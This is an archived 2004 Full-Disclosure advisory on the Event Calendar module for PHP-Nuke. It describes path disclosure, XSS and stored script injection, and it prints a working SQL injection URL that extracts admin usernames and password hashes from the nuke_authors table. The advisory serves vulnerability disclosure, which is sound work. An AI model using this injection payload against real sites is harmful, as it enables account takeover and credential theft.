[Full-Disclosure] [waraxe-2004-SA#038 - Multiple vulnerabilities in Event Calendar module for PhpNuke]

From: Janek Vind (come2waraxe_at_yahoo.com)
Date: 11/16/04

  • Next message: upb: "Re: [Full-Disclosure] question regarding CAN-2004-0930"
    To: full-disclosure@lists.netsys.com
    Date: Tue, 16 Nov 2004 13:18:17 -0800 (PST)
    
    

    {================================================================================}
    { [waraxe-2004-SA#038]
                              }
    {================================================================================}
    {
                              }
    { [ Multiple vulnerabilities in Event Calendar
    module for PhpNuke ] }
    {
                              }
    {================================================================================}
                                                          
                                                          
                      
    Author: Janek Vind "waraxe"
    Date: 17. November 2004
    Location: Estonia, Tartu
    Web: http://www.waraxe.us/index.php?modname=sa&id=38

    Affected software description:
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    Module's Name: Event Calendar
    Module's Version: 2.13 - March 16th, 2004
    Module's Description: Provides an event calendar for
    PHP-Nuke communities.
    License: GNU/GPL
    Author's Name: Original author - Rob Sutton.
    Development continued by Holbrookau.
    Author's Email: phpnuke@holbrookau.net

    Event Calendar - a module for PHP-Nuke.
    Based on version 1.5 by Rob Sutton, the Event Calendar
    found here is much updated
    and features many improvments and add-ons. For
    example, the administration area features
    configuration via a graphical interface, posting of
    events can be moderated and users even
    have the option of adding comments to any event.

    Homepage: http://phpnuke.holbrookau.net/

    Vulnerabilities:
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    This piece of sowtware has many security related flaws
    due to poor user-submitted data
    handling.

    A - Full Path Disclosure
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    A1 - full path disclosure in "config.php":

    http://localhost/nuke73/modules/Calendar/config.php

    Warning: main(modules/Calendar/configset.php): failed
    to open stream: No such file or directory in
    D:\apache_wwwroot\nuke73\modules\Calendar\config.php
    on line 11
    Warning: main(): Failed opening
    'modules/Calendar/configset.php' for inclusion
    (include_path='.;c:\php4\pear') in
    D:\apache_wwwroot\nuke73\modules\Calendar\config.php
    on line 11
    Warning: main(mainfile.php): failed to open stream: No
    such file or directory in
    D:\apache_wwwroot\nuke73\modules\Calendar\config.php
    on line 14
    Warning: main(): Failed opening 'mainfile.php' for
    inclusion (include_path='.;c:\php4\pear') in
    D:\apache_wwwroot\nuke73\modules\Calendar\config.php
    on line 14
    Warning: main(modules//language/lang-english.php):
    failed to open stream: No such file or directory in
    D:\apache_wwwroot\nuke73\modules\Calendar\config.php
    on line 19
    Warning: main(): Failed opening
    'modules//language/lang-english.php' for inclusion
    (include_path='.;c:\php4\pear') in
    D:\apache_wwwroot\nuke73\modules\Calendar\config.php
    on line 19

    A2, A3 - full path disclosure in "index.php" and
    "submit.php":

    http://localhost/nuke73/modules/Calendar/index.php
    http://localhost/nuke73/modules/Calendar/submit.php

    B - XSS aka cross site scripting:

    Examples:

    http://localhost/nuke73/modules.php?name=Calendar&file=submit&type=[xss
    code here]
    http://localhost/nuke73/modules.php?name=Calendar&file=submit&op2=Preview&day=[xss
    code here]
    http://localhost/nuke73/modules.php?name=Calendar&file=submit&op2=Preview&month=[xss
    code here]
    http://localhost/nuke73/modules.php?name=Calendar&file=submit&op2=Preview&year=[xss
    code here]
    http://localhost/nuke73/modules.php?name=Calendar&file=submit&op2=Preview&type=[xss
    code here]

    C - script injection in calendar event comments:

    It's serious bug - anyone can insert javascript
    exploit code to event comments
    and if user or admin will read it, javascript will
    trigger and bad things can
    happen - like cookie theft, arbitrary admin
    operations, etc.

    D - critical sql injection bugs in code:

    If we take a deep look at source code, then there can
    be found multiple sql queries,
    where some variables, mostly "$eid" and "$cid" ARE NOT
    surrounded with single quotes.
    Therefore sql injection is possible. Further
    exploitation will depend on database
    software and version. In case of the mysql version 4.x
    with UNION functionality enabled,
    arbitrary data can be retrieved from database,
    inluding admin(s) authentication credentials.
    As tradition, there is proof of concept:

    ----------------[ real life exploit ]---------------

    http://localhost/nuke73/modules.php?name=Calendar&file=index&type=view&eid=-99%20UNION%20ALL%20SELECT
    %201,1,aid,1,pwd,1,1,1,1,1,1,1,1,1,1%20FROM%20nuke_authors%20WHERE%20radminsuper=1

    ----------------[/real life exploit ]---------------

    How to fix:
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    Vendor contacted: 06. September 2004
    Vendor responded: 06. September 2004
    Detailed list of problems sent to vendor: 08.
    September 2004

    Since then no more response from software developer
    and downloadable version
    still unpatched.

    For help with patching look @ here -
    http://www.waraxe.us/forums.html

    Additional recources:
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    Free proxy lists -
    http://www.waraxe.us/forum/viewforum.php?f=21
    Base64 online tool -
    http://base64-encoder-online.waraxe.us/base64/base64-encoder.php

    Greetings:
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    Greets to Raido Kerna, icenix, g0df4th3r and
    slimjim100!
    Tervitused - Heintz ja Maku!

    Contact:
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

        come2waraxe@yahoo.com
        Janek Vind "waraxe"

        Homepage: http://www.waraxe.us/

    ---------------------------------- [ EOF ]
    ------------------------------------

                    
    __________________________________
    Do you Yahoo!?
    Meet the all-new My Yahoo! - Try it today!
    http://my.yahoo.com
     

    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html


  • Next message: upb: "Re: [Full-Disclosure] question regarding CAN-2004-0930"